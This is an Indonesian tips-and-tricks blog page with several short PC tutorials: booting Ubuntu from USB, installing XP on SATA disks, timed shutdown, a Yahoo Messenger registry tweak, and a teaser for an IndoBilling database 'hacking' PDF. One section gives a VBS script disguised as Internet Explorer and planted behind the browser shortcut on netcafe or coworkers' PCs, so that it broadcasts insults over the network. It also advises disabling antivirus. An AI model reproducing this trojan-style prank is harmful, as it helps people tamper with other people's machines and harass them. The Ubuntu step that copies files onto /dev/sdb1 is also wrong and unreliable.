Tips dan Trik


Berbagai tips dan trik sederhana yang lumayan berguna buat ilangin stress

Hacking Database Indobilling

IndoBilling merupakan salah satu aplikasi billing yang cukup populer digunakan oleh berbagai warnet, rental, game center maupun café-café hotspot. Indobilling termasuk aplikasi yang bersifat client-server artinya ada aplikasi yang bertindak sebagai server dan aplikasi lainnya sebagai client dalam hal ini komputer yang digunakan operator adalah IndoBilling server sementara pengguna menggunakan IndoBilling client.

Untuk mengatur informasi berupa tarif, lama durasi serta paket2 menarik yang ditawarkan termasuk juga administrasi server yang meliputi setting tarif, manajemen operator dsb dibutuhkan aplikasi database. Database sendiri merupakan aplikasi yang berfungsi menyimpan data-data dan melakukan query terhadap data-data itu sendiri.

Salah satu contoh aplikasi database yang cukup populer yaitu MySQL yang sampai saat ini merupakan database yang bersifat open source yang banyak digunakan dalam berbagai aplikasi misalnya web, kasir dan tentunya IndoBilling. Sampai tulisan ini dibuat IndoBilling terbaru yakni versi 6.x masih menggunakan MySQL 3.23 dan MySQL 4.1 dengan storage engine MyISAM.

Tulisan ini dibuat hanya sebatas orang yang melakukan hacking adalah operator warnet itu sendiri , untuk pengguna warnet akan saya tulis dalam edisi selanjutnya

Lebih lengkapnya silahkan download filenya dalam format PDF berikut ini

AttachmentSize
hacking_dbase_indobilling.zip646.37 KB

Instalasi Windows XP di Harddisk SATA Notebook

Sistem operasi Windows Vista telah dirilis, namun sampai saat ini masih jarang yang menggunakannya dikarenakan oleh beberapa sebab diantaranya spesifikasi hardware yang dibutuhkan terlalu tinggi, kompatibilitas dengan software-software yang ada masih kurang dan masih banyak faktor lainnya.

Hingga kini masih banyak pengguna yang masih setia menggunakan Windows XP sebagai sistem operasinya, bahkan pengguna yang memiliki komputer dengan spesifikasi hardware yang lumayan tinggi juga masih setia menggunakan Windows XP. Namun sayangnya Windows XP memiliki masalah saat dilakukan instalasi pada komputer yang menggunakan harddisk SATA, hal ini disebabkan karena di dalam CD installer Windows XP tidak terdapat driver yang berfungsi untuk mendeteksi keberadaan harddisk SATA tersebut. Untuk mengatasi masalah tersebut kita dapat membuat installer Windows XP me-load drivernya dengan cara menekan tombol F6 saat melakukan instalasi, kemudian Windows XP tersebut akan me-load driver controller harddisk SATA yang sebelumnya sudah kita copy ke disket.

Masalahnya sekarang, bagaimana jika komputer kita tidak memiliki floppy drive?terutama notebook-notebook sekarang yang sudah tidak menggunakan floppy drive?solusinya tinggal nyari floppy drive USB beres kan. Namun solusi tersebut tidaklah ekonomis mengingat harganya lumayan mahal terutama buat kalangan mahasiswa, itupun hanya dipergunakan sekali saja pada saat instalasi dan jaman sekarang sepertinya sudah jarang yang menggunakan disket sebagai media penyimpan mengingat harga UFD(USB Flash Disk) yang semakin terjangkau harganya dengan kapasitas yang jauh lebih besar dibandingkan dengan disket.

Solusi yang terakhir dan yang paling hemat yaitu dengan meintegrasikan driver controller HD SATA ke dalam CD instalasi Windows XP. Program yang digunakan untuk mengintegrasikan driver tersebut yaitu nlite program freeware yang dapat di download di http://www.nliteos.com dan syaratnya program ini dapat berjalan Anda harus menginstall .NET Framework minimal versi 1.1 yang dapat di download di http://microsoft.com. Untuk lebih lengkapnya silahkan download tutorial ini dalam bentuk PDF pada link berikut ini :

AttachmentSize
instalasi_windows_xp_di_harddisk_sata_notebook.zip359.94 KB

Install Ubuntu 7.10 Gutsy Gibbon Dari USB FLASH

Bagi yang ingin menginstall Ubuntu 7.10 tanpa CDROM bisa menggunakan USB FLASH sebagai alternatif, syaratnya PC harus support booting dari USB Port dan USB flash dengan kapasitas minimal 1 GB.

Untuk membuat USB bisa sebagai bootable di perlukan syslinux atau software pembuat bootable lainnya, saya menggunakan syslinux untuk membuat USB bootable karena aplikasinya sudah ada direpository Ubuntu.

Untuk install applikasi syslinux di Ubuntu bisa langsung dilakukan dari terminal console :

$ sudo apt-get install syslinux mtools

Setelah proses installasi selesai kemudian mount USB, Biasanya partisi USB ada pada /dev/sdb atau /dev/sdb1, dan di mounting di dalam folder media dengan nama folder usb atau nama label USB tersebut, untuk melihat partisi harddisk dan USB bisa dengan cara:

$ sudo fdisk -l

untuk membuat USB Flsh bisa sebagai bootable dengan syslinux cukup mengetikan perintah ini pada terminal console

$ sudo syslinux -s /dev/sdb1

selanjutnya copy semua file yang ada di Live CD Ubuntu 7.10 “Gutsy Ribbon” ke dalam USB

$ sudo cp -rp /media/cdrom/* /dev/sdb1

Setelah proses copy file selesai, ubah nama folder isolinux menjadi syslinux, didalam folder syslinux ganti nama file isolinux.bin dan isolinux.cfg menjadi syslinux.bin dan syslinux.cfg

Bila di Windows download file syslinux dari http://freshmeat.net/redir/syslinux/10177/url_zip/syslinux-3.51.zip

Kemudian extrak ke dalam direktori C dengan nama syslinux. Pada command promt windows masuk ke direktory c\:syslinux\win32, gunakan perintah berikut untuk membuat usb bisa sebagai bootable disk : syslinux -s F: ( asumsi usb drive di F ), kemudian copy semua file di Ubuntu 7.10 Live CD ke dalam USB, sebaiknya gunakan command :

xcopy /e /h /k d:\*.* f: (D sebagai CDROM)

Selanjutnya USB FLASH sudah bisa di gunakan sebagai penganti Ubuntu 7.10 Gutsy Ribbon Live CD.

Shutdown Windows Anda Secara Otomatis

Anda pernah mendengarkan musik lewat komputer hingga anda ketiduran? Atau anda pernah menonton TV lewat TV Tuner sampai ketiduran dan komputer tetap menyala sewaktu anda tidur? Hal ini selain membuat PC anda bekerja secara terus menerus juga akan membuat tagihan listrik anda membengkak!

Jgn khawatir, saya akan mengajarkan beberapa trik untuk pencegahannya, tanpa install software apapun anda bisa mengerjakannya dgn mudah, mari kita mulai:

1. Klik menu start > run atau tekan tombol jendela windows + r

2. Ketikkan: tsshutdn XX /powerdown
NB: XX = waktu yang anda inginkan dalam hitungan detik

Misal Anda ingin memasang timer selama 1 jam, maka anda tinggal mengetikkan tsshutdn 3600 /powerdown

3. Jika sudah, klik OK, akan muncul jendela konfirmasi dgn pesan:
"System is shuting down in 3600 seconds"

4. Klik OK pada jendela pop up tersebut

5. Minize jendela DOS yg muncul (jendela DOS jangan di CLOSE. Jika di CLOSE maka timer tidak akan berjalan)

Tips Bikin Rusuh di Warnet dan Kantor

Kerusuhan ini hanya terjadi jika seluruh kompie yang digunakan menggunakan Windows XP SP 1 ke bawah dan Windows 2000 All SP hal ini karena service messenger pada Windows XP SP2 telah dinonaktifkan secara default.

Jika Anda di warnet pilihlah warnet yang jika setelah selesai logout billing, maka kompie client tidak shutdown/restart hal ini agar mencegah deep freeze membalikkan setting defaultnya sehingga korban Anda adalah pemakai setelah Anda. Jika Anda di kantor, pilihlah kompie rekan kerja Anda yang menyebalkan hehehehhe…

Nah berikut langkah-langkahnya :

Buka Notepad kemudian ketikkan script VBS berikut ini.

Set perintah = CreateObject("WScript.Shell")
Set eksekusi = perintah.Exec("iexplore")
pesan = "Dasar lu bangsat, bajingan! Ayo kalo berani pukul saya!"
jalan2 = "cmd /c net.exe send * " & pesan
perintah.run jalan2, 0, true

Langkah 2:
Simpan dengan nama iexplore.vbs. Jangan lupa untuk mengubah Save as type dari Text Documents (*.txt) menjadi All Files.

Langkah 3:
Kemudian simpan pada direktori tempat web browser Anda berada. Misal web browser Anda terletak di C:\Program Files\Internet Explorer maka tempatkanlah script yang telah Anda buat tadi di direktori tersebut. Terlihat bahwa script yang Anda buat berada dalam satu direktori dengan aplikasi Internet Explorer

Langkah 4:
Bukalah Properties dari shorcut Internet Explorer dengan cara klik kanan pada icon Internet Explorer yang terdapat pada Desktop Anda kemudian pilih Properties. Maka jendela Internet Explorer akan terbuka. Ubahlah iexplore.exe menjadi iexplore.vbs pada kolom Target.

Langkah 5:
Klik tombol OK. Kemudian hapuslah semua icon yang berada di Quick Launch, Desktop dan Programs yang menuju ke web browser (kecuali icon Internet Explorer yang telah di edit link-nya tadi).

Langkah 6:
Jika si korban menjalankan web browser dari link tersebut maka akan keluar pesan dan jendela Internet Explorer akan terbuka.
Tentunya orang yang berada dalam satu jaringan dengan si korban akan kaget jika orang tersebut mudah emosi atau marah gak tau deh yang penting saya gak ikut2

Tips:
Matikan (disable) antivirus lalu tempatkan icon yang telah Anda edit link-nya di Programs atau Quick Launch.

Trik Multi Login ID di Yahoo Messenger 8

Kalau mau login dengan beberapa ID di YM 8 secara bersamaan nih ada triknya :

1. Start menu >> run >> ketik ‘regedit’

2. My Computer >> HKEY_CURRENT_USER >> Software >> Yahoo >> Pager >> Test

3. Setelah masuk folder registry ‘Test’ >> klik kanan ‘NEW DWORD value’ >> lalu rename dengan Plural

4. Plural td klik kanan >> modify >> isi valuedata dengan angka selain 0, misal 1( angka Binary, 0 dan 1).

5. View >> Refresh

6. Lalu jalankan YM 8 Anda!!

Buka aja berapapun YM yg Anda inginkan, yg penting RAM memadai...

0 comments:

Posting Komentar

Video Gallery